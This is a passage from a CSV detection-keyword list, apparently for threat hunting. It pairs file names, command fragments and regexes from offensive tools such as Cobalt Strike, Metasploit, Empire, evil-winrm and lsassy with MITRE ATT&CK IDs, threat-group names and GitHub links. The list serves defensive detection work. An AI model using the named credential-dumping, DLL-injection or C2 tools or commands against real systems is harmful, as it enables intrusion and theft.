discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Dliv3/Venom*",".{0,1000}Dliv3\/Venom.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*DLL Hell - DLL Proxifier/Hijacker*",".{0,1000}DLL\sHell\s\-\sDLL\sProxifier\/Hijacker.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*dll* [HIJACKABLE]*",".{0,1000}dll.{0,1000}\s\[HIJACKABLE\].{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*dll\reflective_dll.*",".{0,1000}dll\\reflective_dll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*dll_generator.py*",".{0,1000}dll_generator\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*dll_hijack_detect_x64*",".{0,1000}dll_hijack_detect_x64.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*dll_hijack_detect_x86*",".{0,1000}dll_hijack_detect_x86.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*dll_hijack_hunter*",".{0,1000}dll_hijack_hunter.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*DLL_Imports_BOF*",".{0,1000}DLL_Imports_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","81","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" "*dll_inject.rb*",".{0,1000}dll_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLL_METASPLOIT_ATTACH*",".{0,1000}DLL_METASPLOIT_ATTACH.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*dll_spawn_cmd.cpp*",".{0,1000}dll_spawn_cmd\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dll_spawn_cmd.exe*",".{0,1000}dll_spawn_cmd\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DLL_TO_HIJACK_WIN10*",".{0,1000}DLL_TO_HIJACK_WIN10.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*DllCanUnloadNow*",".{0,1000}DllCanUnloadNow.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*dllexploit.*",".{0,1000}dllexploit\..{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*DllExport -*",".{0,1000}DllExport\s\-.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLLHijackAuditKit*",".{0,1000}DLLHijackAuditKit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLLHijackAuditKit.zip*",".{0,1000}DLLHijackAuditKit\.zip.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DLL-Hijack-Search-Order-BOF*",".{0,1000}DLL\-Hijack\-Search\-Order\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*DLLHijackTest.dll*",".{0,1000}DLLHijackTest\.dll.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*DLLHijackTest.sln*",".{0,1000}DLLHijackTest\.sln.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*DLLHijackTest-master*",".{0,1000}DLLHijackTest\-master.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","1","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*dllinject *",".{0,1000}dllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*dllinject.py*",".{0,1000}dllinject\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*-DllInjection.ps1*",".{0,1000}\-DllInjection\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllInstall is used when executing the Merlin agent with regsvr32.exe*",".{0,1000}DllInstall\sis\sused\swhen\sexecuting\sthe\sMerlin\sagent\swith\sregsvr32\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*dllKitten.dll*",".{0,1000}dllKitten\.dll.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*DllLdr.x64.bin*",".{0,1000}DllLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*dllload *",".{0,1000}dllload\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Dll-Loader -http -path *",".{0,1000}Dll\-Loader\s\-http\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Dll-Loader -local -path*",".{0,1000}Dll\-Loader\s\-local\s\-path.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*Dll-Loader -smb -path *",".{0,1000}Dll\-Loader\s\-smb\s\-path\s.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*DllLoaderLoader.exe*",".{0,1000}DllLoaderLoader\.exe.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*-DllName *-Module *",".{0,1000}\-DllName\s.{0,1000}\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllNotificationInjection.cpp*",".{0,1000}DllNotificationInjection\.cpp.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of 